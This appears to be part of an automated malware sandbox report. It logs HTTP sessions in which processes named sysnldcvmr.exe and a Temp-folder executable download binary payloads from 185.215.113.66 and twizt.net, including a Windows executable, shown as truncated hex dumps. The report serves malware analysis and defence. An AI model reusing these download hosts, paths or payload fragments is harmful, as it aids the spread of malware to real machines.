                                                                                                                                                                                                                                                  Data Ascii: 3~Q?.G}m'YFE3gY)0Ed`|mv/N.bT3>r_qaE~=1u,Ok['HJyp[+"22?!s8:8Lb|BQEdqN96>7:WtKtrXl2CDFcu~ZZqrD-#l}E&Q
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.247714043 CET744INData Raw: 37 36 14 ef 30 ee f8 f2 f4 b1 32 98 51 9c 01 31 ae e5 14 0d d7 4f dc 08 c1 ff d0 f6 0c b9 ba 36 ce 8c 81 ed ae 51 2e 2d dd 11 21 52 a2 c6 ae 9a 19 04 42 88 fd f9 34 22 97 f2 66 93 e9 57 03 52 d5 56 9d b9 33 43 49 36 e9 35 df e2 f0 f5 c6 9b b5 78
                                                                                                                                                                                                                                                  Data Ascii: 7602Q1O6Q.-!RB4"fWRV3CI65x`3$Tg^:F=nlX,#~4?^./1OV&}S5x8>mw{iQr8!XUfG.p2"3PoG%X@3|_M|7
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.247742891 CET1236INData Raw: e9 fd a6 b8 fd f0 da a6 27 f3 9a e7 ca 4c 95 ac 40 22 a6 fd 28 3f 72 f6 ba 54 b7 cb ce 62 32 48 61 99 31 c2 26 77 3c 9e b9 8f ec d8 a9 2b 6e 6c c1 ef 6d 34 e7 d2 5c a8 68 3e 85 36 3f 6c cb 14 8b e4 50 7e 9f 27 e2 c3 82 8b 33 4f 7c 44 d7 48 48 6f
                                                                                                                                                                                                                                                  Data Ascii: 'L@"(?rTb2Ha1&w<+nlm4\h>6?lP~'3O|DHHojCa->'XcEgPfd~\ci].ss^*oHGby%<w/oF`l(WWNa0G%::PTBjbPK;]R`SeA!^
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:56.247756004 CET340INData Raw: 1f ce 61 f2 44 97 0d 53 57 18 6c 29 ae 6d 9a af 47 ad 11 15 5b 65 e8 99 76 8d 49 78 42 5a d7 03 03 db 51 0c 57 57 fe eb 8b 30 b8 70 d8 76 da b7 a1 e0 75 66 9a 7e 51 b6 be ff 5b 55 5a d5 6b fc 99 22 01 aa ef db 3b d2 d9 a7 67 36 e3 ed 93 8b c4 e5
                                                                                                                                                                                                                                                  Data Ascii: aDSWl)mG[evIxBZQWW0pvuf~Q[UZk";g6wjI'i[+`0.q:I$Dy_}~G):oR`Og";h~K^oxXTir&D\?uTGmK>*clj_)<1zk:!


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  3192.168.2.1149756185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:57.788091898 CET166OUTGET /1 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.111695051 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:31:58 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 9472
                                                                                                                                                                                                                                                  Last-Modified: Tue, 03 Dec 2024 13:03:44 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "674f01b0-2500"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: a8 ae a9 45 71 6e c0 b6 37 92 82 98 6e c2 a5 8e 2a 25 0f 76 20 75 26 50 55 1b ea 98 8e dc 4b 3a 96 50 b2 58 9e 09 77 fc 6a 3e b2 ab 3f 68 e1 72 12 22 42 c3 f5 05 48 2b 3c f4 a3 5f 81 f1 69 40 de 88 46 74 8c a1 91 28 1e b3 2a b1 73 49 65 e4 30 ef 87 61 6c 0a 1b 2e 93 42 4d 1a 5f 8f db c0 ee 24 22 98 b5 6f 90 1b 36 1f 11 c7 a2 b9 2a e5 36 35 cf 09 16 aa fa 26 f0 e6 ac 23 26 a8 73 51 08 65 c5 6e 1a f7 9d 52 1b ba 02 48 1d c4 af c4 1a b4 1f ed be cd d6 16 b3 78 f7 81 a8 86 53 0d f6 07 4d b4 82 f1 f9 22 de 19 0a a4 97 3c b1 e5 7a c7 ec b5 bc e7 a9 6a 83 67 a1 1c 3e 3c 43 ec 39 84 b6 31 c7 5b 0b 3a 86 a9 ce 31 57 2f 03 ad cb 38 ec c0 01 c8 17 63 04 aa f1 90 8b d2 68 f6 1d 5b ba d7 10 6d a2 88 9a e8 eb 51 b1 13 00 f5 25 8e 1b 7f 62 70 b3 e9 bd bc 01 e8 18 3d be 3d 50 9b 98 a1 c2 24 ef f2 3f eb 2f cf 9f e3 e6 9b 35 85 3a 85 6a 04 c7 20 b2 30 bd e8 12 d0 cf 39 7b 0a 29 d4 84 52 4c 64 b5 a3 75 4e 80 ef 22 ae 05 61 3c 18 53 fd ad 22 1f 26 d1 00 46 9a bf a2 81 8d 9e 6f 98 71 49 b7 7d 53 7d 98 a8 4a fd bf da 86 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: Eqn7n*%v u&PUK:PXwj>?hr"BH+<_i@Ft(*sIe0al.BM_$"o6*65&#&sQenRHxSM"<zjg><C91[:1W/8ch[mQ%bp==P$?/5:j 09{)RLduN"a<S"&FoqI}S}J&fRt:Dx_B)OUDdx7Da}Zk)%j_7?Wg.l`<#Z#bp1PTbkGx7[5.!RFmw52)ZTNy8A(`_^Z`"7w\=Bz-s'Dxe%sI,_8<1Bp)a0Q_I^fBoaF>O*0X5(e/kaa.39[rJ&3V:9_k"ft{wTsVHcNER.tKB:c4+}U2M.! hm%C>={g_{NBaA~}_Rzyjm9Os+zQ[Z`Yi@RjaAaBmA@zY!+oUHWO$1fsK:0:*,a\n>\P(Lr@xSie;b|HyW9>Sgx%2S\4`zG
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.111733913 CET124INData Raw: 24 13 d6 38 8f fc 29 77 22 b4 15 19 b0 a1 cb b7 e0 4b 1c 76 57 dd 1d f0 60 d9 f7 52 69 5b 23 e7 38 30 47 63 bb ed 1b f7 15 f5 97 29 91 dd ce 82 b8 e8 94 a9 05 9b 8f 35 1e 45 c7 e8 20 ef d0 db 16 80 fe b4 ac eb 35 12 74 77 72 24 37 62 b3 27 5c 81
                                                                                                                                                                                                                                                  Data Ascii: $8)w"KvW`Ri[#80Gc)5E 5twr$7b'\{Zuw|1r
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.114202976 CET1236INData Raw: a4 24 91 bc b1 db 4b dd 2f 2e 0a 15 f6 c5 76 91 95 d9 c2 24 e8 c1 a1 24 33 78 ce da c4 6a 9a 37 c2 47 a9 49 1f 18 c0 90 38 77 03 41 3e 24 f9 f8 aa 36 d3 9d 0d ff c2 f1 93 8a c7 96 ae 86 a0 4e f2 46 6a f5 68 32 6d e0 f3 5b f3 ba db cb 0e cc 3d 0b
                                                                                                                                                                                                                                                  Data Ascii: $K/.v$$3xj7GI8wA>$6NFjh2m[=k08a}H E"5G[A9\'xZLU'0O]f.SHzv_JnUC6C-!-H;DF6($enNQ>
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.114213943 CET224INData Raw: 60 33 e4 57 f1 78 d1 30 0a 9b 62 2f 1d 1c 08 c3 a5 22 2e d1 34 87 16 2a 41 c9 4d ee 9b 30 49 1e e8 6a 53 83 23 cc 9c 17 d8 4f f9 27 31 01 56 11 23 a0 23 2b 2e 6a 74 1f 74 73 cb 11 cb c1 2a 0d ec 1a 0e ee 73 8d 1b 70 ac 87 f3 fc 34 46 db 9b d7 c1
                                                                                                                                                                                                                                                  Data Ascii: `3Wx0b/".4*AM0IjS#O'1V##+.jtts*sp4F9a0{W{+mF9_X#9`<`811MEECM_bOj2jvv;))z46WF7zcMOYmHJc)6m&%Z'|
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.114226103 CET1236INData Raw: eb 3a 00 2e b2 93 6f 38 35 f1 e1 15 0d ff ac 3e fb 24 ba 3d 2d e8 4c b1 c7 e2 e6 12 f5 1f 00 d3 bf d1 0f d9 e7 08 62 79 cc d3 fe fe 70 d6 66 29 ea 03 0f e0 75 eb e2 3e 6e 95 73 01 1e 73 c6 a3 3c b5 1b 8e 8d 13 79 3a f1 ba 65 1f c9 03 00 9e cf c2
                                                                                                                                                                                                                                                  Data Ascii: :.o85>$=-Lbypf)u>nss<y:e0lE#!)D|.GkNjzuU~sS'2GIAF7Ulz{^r?^<6.2FT,wC+{pN}WouT{Fm,Z!
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.114238977 CET24INData Raw: b2 70 c8 24 55 25 2d 49 a6 e5 1a ae 8d dc b6 a6 3c 0c c0 78 c5 16 13 5b
                                                                                                                                                                                                                                                  Data Ascii: p$U%-I<x[
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.116379976 CET1236INData Raw: 01 5e 1e 42 70 f5 61 73 f1 0c 3e fb ed 02 70 e3 f2 8d 7f 63 08 8e 11 34 36 48 68 74 e5 6c fd 21 7b e7 09 bc e5 e6 a4 c2 a6 e9 8a f5 1b 49 0f dc cc 82 ee 89 3a db 91 dc 48 5d c4 98 b8 0a ed b8 9b 4c 28 09 ce cd 2b 86 8b 9d 2d 80 57 c4 60 4b 06 a6
                                                                                                                                                                                                                                                  Data Ascii: ^Bpas>pc46Hhtl!{I:H]L(+-W`KkE_P@%))"=$%<b80{`\3@<U/t-%"[-7(*q.S.e|a_iB>9m2Q|cjC,uMQ&ez; >}V`?`0
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.116414070 CET1236INData Raw: 15 9d fe f4 07 05 d4 1f f0 a0 6c d7 0d 39 91 a5 49 3c 8c eb 10 ca 4d 06 b0 60 1b 8d 58 c7 ab 92 c7 6b 55 73 52 ea 55 db d8 37 96 94 06 5a f4 de d8 41 92 1d 88 57 80 f0 71 ad ce 92 66 d8 88 f2 98 f1 66 20 d4 ab ff c3 3c af a6 a0 83 3e b2 ed b3 a0
                                                                                                                                                                                                                                                  Data Ascii: l9I<M`XkUsRU7ZAWqff <>j+Sh.Psl)cbF{q<Cj?=~,6,$yZ_74QuGS_C|Pn-b'npNv:A+[97]Lg!7[,m["*?{|(|v
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.116424084 CET248INData Raw: 08 27 45 cd 18 52 40 e6 c0 c5 d7 9c b3 55 03 87 49 31 c8 3e f3 3c a4 ce 21 1d b9 07 76 a5 4d fa 01 d5 59 74 0e 97 25 b1 17 6a ae 4d 8d a3 26 b7 54 27 30 df 79 e7 77 51 ef 0e e9 db db 06 62 c7 b9 15 b1 b4 6a 0c a6 e2 c5 1e 41 70 6d 8c 37 64 c6 eb
                                                                                                                                                                                                                                                  Data Ascii: 'ER@UI1><!vMYt%jM&T'0ywQbjApm7d`YA8dFIy{7{,wdFQg7TRorwfw`[q/LC]CmBqbWvI}DNAW[f*cSqZ_hMt1JA:
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.119033098 CET1236INData Raw: c3 40 7a 9b 27 88 a7 3d f3 4f 76 4f 9d 81 2a b8 bb 78 1e 60 55 87 2d 9c f4 43 a7 94 ea a1 c2 c9 2f b8 1a 96 e8 d8 3d 74 c2 4d 2c e7 ed 9f 87 5a 87 18 a2 55 92 88 6d 32 bc 9e ca 3d fc 86 bc 95 a6 19 f7 67 2c bc a2 27 0b 4e da 6e 9e 27 b8 1d 15 29
                                                                                                                                                                                                                                                  Data Ascii: @z'=OvO*x`U-C/=tM,ZUm2=g,'Nn')/C]jmO2qPy,v5yQiQl[x;l@>ULb@7pi.Rxju}Kw(|JC79dh<>}+4mXHBhQ%
                                                                                                                                                                                                                                                  Dec 5, 2024 17:31:59.231987953 CET1236INData Raw: 54 04 7d 2a c5 e8 7a 84 17 11 2f 10 d3 cc a0 28 56 de b0 1d 7f e5 62 6e 42 76 ba fa 46 3e c1 2e 67 c3 68 cb 43 43 dc 04 be e4 87 e3 86 cd bd 5c c0 ef 84 63 ee 86 09 76 95 ee 98 48 cd 8c 37 bd fc 9e 5b 38 2d 26 09 9e 8d 78 09 76 22 65 39 fd 91 cb
                                                                                                                                                                                                                                                  Data Ascii: T}*z/(VbnBvF>.ghCC\cvH7[8-&xv"e9c2M7|t5s<VUnMi.~_'L@"(?rTb2Ha1&w<+nlm4\h>6?lP~'3O|DHHojCa->'XcEgPf
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:04.410579920 CET166OUTGET /2 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:04.848979950 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:32:04 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 10496
                                                                                                                                                                                                                                                  Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "67154d18-2900"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  4192.168.2.1149775185.215.113.66808016C:\Users\user\AppData\Local\Temp\1171111125.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:03.706990004 CET166OUTGET /rh.exe HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: twizt.net
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.059839010 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:32:04 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 449536
                                                                                                                                                                                                                                                  Last-Modified: Mon, 02 Dec 2024 07:59:26 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "674d68de-6dc00"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cd d8 9a 7a 89 b9 f4 29 89 b9 f4 29 89 b9 f4 29 c2 c1 f7 28 82 b9 f4 29 c2 c1 f1 28 06 b9 f4 29 c2 c1 f0 28 9d b9 f4 29 9c c6 f1 28 af b9 f4 29 9c c6 f0 28 98 b9 f4 29 9c c6 f7 28 9d b9 f4 29 c2 c1 f5 28 8a b9 f4 29 89 b9 f5 29 da b9 f4 29 89 b9 f4 29 8b b9 f4 29 b3 39 f0 28 8a b9 f4 29 b3 39 0b 29 88 b9 f4 29 b3 39 f6 28 88 b9 f4 29 52 69 63 68 89 b9 f4 29 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 5f 7b 5f 64 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 25 00 7c 03 00 00 66 03 00 00 00 01 00 be c7 02 00 00 10 00 00 00 90 03 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$z)))()()()()()()()))))9()9))9()Rich)PEL_{_d%|f@@y("@nm@.textC{| `.textbss.rdata@@.data;2p@.rsrc@@.reloc"$@B
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.059953928 CET124INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 31 c0 ba 04 00 00 00 c7 01 66 41 55 a8 01 d1 01 d0 c7 01 a7 b4 48 26 01
                                                                                                                                                                                                                                                  Data Ascii: U1fAUH&q6/
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.062495947 CET1236INData Raw: d0 c7 01 a4 de 54 c0 01 d1 01 d0 c7 01 82 66 4c 03 01 d1 01 d0 c7 01 4c 06 0a 55 01 d1 01 d0 c7 01 21 dd 16 e8 01 d1 01 d0 c7 01 76 1f ff 93 01 d1 01 d0 c7 01 67 3b 76 73 01 d1 01 d0 c7 01 3f 6c 33 25 01 d1 01 d0 c7 01 2b 87 15 4d 01 d1 01 d0 c7
                                                                                                                                                                                                                                                  Data Ascii: TfLLU!vg;vs?l3%+M.4Ff[K$NA.>1_bEW1tQ-FfzzFD$#1
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.062510014 CET1236INData Raw: e0 01 d1 01 d0 c7 01 11 9f 58 4e 01 d1 01 d0 c7 01 3a 28 e9 2a 01 d1 01 d0 c7 01 94 f7 df a4 01 d1 01 d0 c7 01 44 eb a8 78 01 d1 01 d0 c7 01 2a 43 bf d5 01 d1 01 d0 c7 01 db 2a 17 25 01 d1 01 d0 c7 01 42 e2 89 62 01 d1 01 d0 c7 01 1d 3c cd ee 01
                                                                                                                                                                                                                                                  Data Ascii: XN:(*Dx*C*%Bb<tEJ$<2~N%[!9a6a'D}Zr\C7$*
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.062521935 CET248INData Raw: 01 0c fd 34 90 01 d1 01 d0 c7 01 03 ad 91 e0 01 d1 01 d0 c7 01 ce 2e 0a c9 01 d1 01 d0 c7 01 e7 a2 07 f7 01 d1 01 d0 c7 01 26 4c e5 17 01 d1 01 d0 c7 01 af 3d fc cd 01 d1 01 d0 c7 01 3c 5d 88 ad 01 d1 01 d0 c7 01 d1 b5 d5 b5 01 d1 01 d0 c7 01 3f
                                                                                                                                                                                                                                                  Data Ascii: 4.&L=<]?/G~BKWh$n>SpIXCMBMDDnB%7
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.064523935 CET1236INData Raw: d0 c7 01 d8 d6 20 4b 01 d1 01 d0 c7 01 94 f5 68 01 01 d1 01 d0 c7 01 28 c8 b8 6c 01 d1 01 d0 c7 01 78 4c ef b7 01 d1 01 d0 c7 01 26 fd 2c f8 01 d1 01 d0 c7 01 4d 0e 56 5c 01 d1 01 d0 c7 01 9b 42 fe 19 01 d1 01 d0 c7 01 92 b6 fb b9 01 d1 01 d0 c7
                                                                                                                                                                                                                                                  Data Ascii: Kh(lxL&,MV\B%rD$G=EK%.VD=ZHTEIhlu+apRK'
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.064537048 CET1236INData Raw: 00 01 d1 01 d0 c7 01 ce 4e a2 27 01 d1 01 d0 c7 01 01 5f 04 da 01 d1 01 d0 c7 01 2b a6 bc 30 01 d1 01 d0 c7 01 09 0a 28 1d 01 d1 01 d0 c7 01 d9 88 4d 52 01 d1 01 d0 c7 01 63 74 ee 4a 01 d1 01 d0 c7 01 6d d2 1d 9b 01 d1 01 d0 c7 01 e4 27 1a 83 01
                                                                                                                                                                                                                                                  Data Ascii: N'_+0(MRctJm's:1JG`@Svmkkiu_vJ;,}vi+W5g
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.064548969 CET248INData Raw: 01 9a ea 76 ce 01 d1 01 d0 c7 01 3b 3b 5c 97 01 d1 01 d0 c7 01 7d b1 08 14 01 d1 01 d0 c7 01 99 29 1a ec 01 d1 01 d0 c7 01 c4 36 e4 11 01 d1 01 d0 c7 01 32 e9 d6 55 01 d1 01 d0 c7 01 36 ae 4a 99 01 d1 01 d0 c7 01 bc 90 cb 30 01 d1 01 d0 c7 01 e0
                                                                                                                                                                                                                                                  Data Ascii: v;;\})62U6J04MumNEJ3q'f?]6&QvGiuSE=
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.067538023 CET1236INData Raw: d0 c7 01 96 93 a3 e3 01 d1 01 d0 c7 01 f5 5c c0 65 01 d1 01 d0 c7 01 19 2b 18 a0 01 d1 01 d0 c7 01 fa 02 4b cb 01 d1 01 d0 c7 01 5f 9f 00 e9 01 d1 01 d0 c7 01 2a b6 13 87 01 d1 01 d0 c7 01 0e 70 ee 45 01 d1 01 d0 c7 01 1f 48 cf 25 01 d1 01 d0 c7
                                                                                                                                                                                                                                                  Data Ascii: \e+K_*pEH%:*I9\45QXj{"bOA[MMpDG[\ ShMKT
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.067692041 CET1236INData Raw: 08 01 d1 01 d0 c7 01 53 9c 3a 6e 01 d1 01 d0 c7 01 5d 2f 19 ae 01 d1 01 d0 c7 01 b0 b1 1a e0 01 d1 01 d0 c7 01 80 9d 90 68 01 d1 01 d0 c7 01 55 f1 58 94 01 d1 01 d0 c7 01 6b 1e df 43 01 d1 01 d0 c7 01 a3 8d c7 92 01 d1 01 d0 c7 01 33 2d b7 45 01
                                                                                                                                                                                                                                                  Data Ascii: S:n]/hUXkC3-Em~cD$ID*5zk;2E`h<]SFaW_V}
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:05.180608034 CET1236INData Raw: 01 90 b8 26 5c 01 d1 01 d0 c7 01 31 69 ab 44 01 d1 01 d0 c7 01 ad 3d 4f d6 01 d1 01 d0 c7 01 60 27 46 71 01 d1 01 d0 c7 01 7d 63 12 3d 01 d1 01 d0 c7 01 0d 4a 5e c0 01 d1 01 d0 c7 01 b2 0b 60 3f 01 d1 01 d0 c7 01 8f ea b4 cd 01 d1 01 d0 c7 01 53
                                                                                                                                                                                                                                                  Data Ascii: &\1iD=O`'Fq}c=J^`?S(-3,>2"}bq}2SLr8


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  5192.168.2.1149781185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:06.041095972 CET166OUTGET /2 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374361992 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:32:07 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 10496
                                                                                                                                                                                                                                                  Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "67154d18-2900"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
                                                                                                                                                                                                                                                  Dec 5, 2024 17:32:07.374403000 CET1236INData Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96
